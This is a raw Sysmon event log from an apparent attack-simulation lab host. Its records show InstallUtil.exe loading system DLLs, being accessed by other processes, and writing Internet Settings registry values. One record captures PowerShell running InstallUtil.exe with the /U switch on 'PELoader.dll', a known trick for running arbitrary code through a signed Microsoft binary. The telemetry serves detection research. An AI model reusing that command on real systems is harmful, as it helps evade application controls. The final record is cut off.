734700x800000000000000057614385Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.578{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValid 734700x800000000000000057614384Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.578{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057614383Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.578{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057614382Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.578{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057614381Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.578{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057614380Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.578{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057614379Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.578{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057614378Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.578{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057614377Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.578{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=F9E249B6BB80C06BA30A61854567796C,SHA256=E5F62CD5D2FE7BE8D4E029ECA004A8773FF8D1F7AB92C115810AD54B5B8F50CAtrueMicrosoft WindowsValid 734700x800000000000000057614376Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.578{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll4.8.4180.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Execution EngineMicrosoft® .NET FrameworkMicrosoft Corporationmscoreei.dllMD5=899A8B655E52A061B33571D97C5C06ED,SHA256=DE05B03E37FB9BA5D74CF8FA36A6F0B15AB61705285B738BC90D14FDE580A45EtrueMicrosoft CorporationValid 734700x800000000000000057614375Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.578{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057614374Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.578{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057614373Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.578{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057614372Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.578{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 10341000x800000000000000057614371Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.562{8B6011A9-A829-618E-48FD-04000000F101}28766048C:\Windows\system32\conhost.exe{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057614370Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.562{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057614369Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.562{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057614368Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.562{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\mscoree.dll10.0.14393.0 (rs1_release.160715-1616)Microsoft .NET Runtime Execution EngineMicrosoft® Windows® Operating SystemMicrosoft Corporationmscoree.dllMD5=5ECE402D7E12EC3750D044BF3D878DF6,SHA256=3F02B1AE7B61BC36B04EA2B82ED79F112219F4E9668518030FF14B005E2C9BBCtrueMicrosoft WindowsValid 734700x800000000000000057614367Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.562{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057614366Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.562{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe4.8.3761.0 built by: NET48REL1.NET Framework installation utilityMicrosoft® .NET FrameworkMicrosoft CorporationInstallUtil.exeMD5=4F296B709C187304D4609C11FD2BDC03,SHA256=756E583FF1E00A5DB0A2BEE3849693920C4BDFBE87D8757834093372CD690C71trueMicrosoft CorporationValid 10341000x800000000000000057614365Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.562{8B6011A9-888A-6164-7000-00000000F101}34483444C:\Windows\system32\csrss.exe{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057614364Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.562{8B6011A9-A828-618E-47FD-04000000F101}3756712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4ce006b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+41634c4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+41630ff(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4c2b42d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4120071(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4183ae3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4165af2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4165af2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4165983(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+41566a3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4163be5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4163757(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+41634c4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+41630ff(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4c2b42d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+41483aa(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+414791c(wow64) 154100x800000000000000057614363Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.570{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe4.8.3761.0 built by: NET48REL1.NET Framework installation utilityMicrosoft® .NET FrameworkMicrosoft CorporationInstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe" /logfile= /LogToConsole=false /U PELoader.dllC:\Users\Administrator\Desktop\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=4F296B709C187304D4609C11FD2BDC03,SHA256=756E583FF1E00A5DB0A2BEE3849693920C4BDFBE87D8757834093372CD690C71{8B6011A9-A828-618E-47FD-04000000F101}3756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 534500x800000000000000057678743Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:51.511{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe 734700x800000000000000057678927Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.730{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ucrtbase_clr0400.dll14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationucrtbase_clr0400.dllMD5=F8F171BE1820544E15B555847005355C,SHA256=CDDF9A2BF085AE59BA464B3BA6394AACFC342DA5F17D77FD5306054C8AABF153trueMicrosoft CorporationValid 734700x800000000000000057678909Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.730{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\vcruntime140_clr0400.dll14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140_clr0400.dllMD5=63936588122BDEE9624D02CE3F8F54EA,SHA256=21F7E6165CE8DD92DB8CDF48CEE83DE64B2B0807B7B499CF87678B70C6F8C32FtrueMicrosoft CorporationValid 734700x800000000000000057678883Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.730{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Common Language Runtime - WorkStationMicrosoft® .NET FrameworkMicrosoft Corporationclr.dllMD5=1AF77AF533C702978D4C91C31DB1CCE5,SHA256=39AB2B2B034E3210D866FCF8649EB84C28E3DAB7CB7FA7C986346C6A9ED22D0AtrueMicrosoft CorporationValid 534500x800000000000000057678867Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.839{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe 734700x800000000000000057678866Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.808{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000057678865Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.808{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000057678864Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.808{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 734700x800000000000000057678863Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.808{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057678862Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.808{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704trueMicrosoft WindowsValid 734700x800000000000000057678861Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.808{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\shell32.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=837B8644B9CE47EC28152E7D764886E0,SHA256=C5BA64473FB38E6B4592EAFA642AF82715CBC676190985D8D8D4150CE840044FtrueMicrosoft WindowsValid 734700x800000000000000057678860Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.792{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\5b778442ed2d60a5de14f752a124bf1a\System.Configuration.ni.dll4.8.4190.0 built by: NET48REL1LAST_BSystem.Configuration.dllMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Configuration.dllMD5=9EAA59368783AFE4107F28B6ED8AB1E6,SHA256=BBAC50983BA9B2EDA9CBA8FD0F1DCABF71D24D736A973BA164AF6917A3FC2E7Ffalse-Unavailable 734700x800000000000000057678859Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.792{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057678858Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.792{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 734700x800000000000000057678857Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.792{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899trueMicrosoft WindowsValid 734700x800000000000000057678856Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.792{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575trueMicrosoft WindowsValid 734700x800000000000000057678855Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 19:23:55.792{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\windows.storage.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=1D7997E3AFC26B85024D33F835E18056,SHA256=B2376967E156D4971FB66059F6367030AF937943D2EBF80AF856E643B6E95BBFtrueMicrosoft WindowsValid 13241300x800000000000000057678854Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 19:23:55.792{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetectDWORD (0x00000000) 13241300x800000000000000057678853Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 19:23:55.792{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranetDWORD (0x00000000) 13241300x800000000000000057678852Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 19:23:55.792{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetectDWORD (0x00000000) 13241300x800000000000000057678851Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 19:23:55.792{8B6011A9-BF4B-618E-0600-05000000F101}9056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranetDWORD (0x00000000) 10341000x800000000000000057678850Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 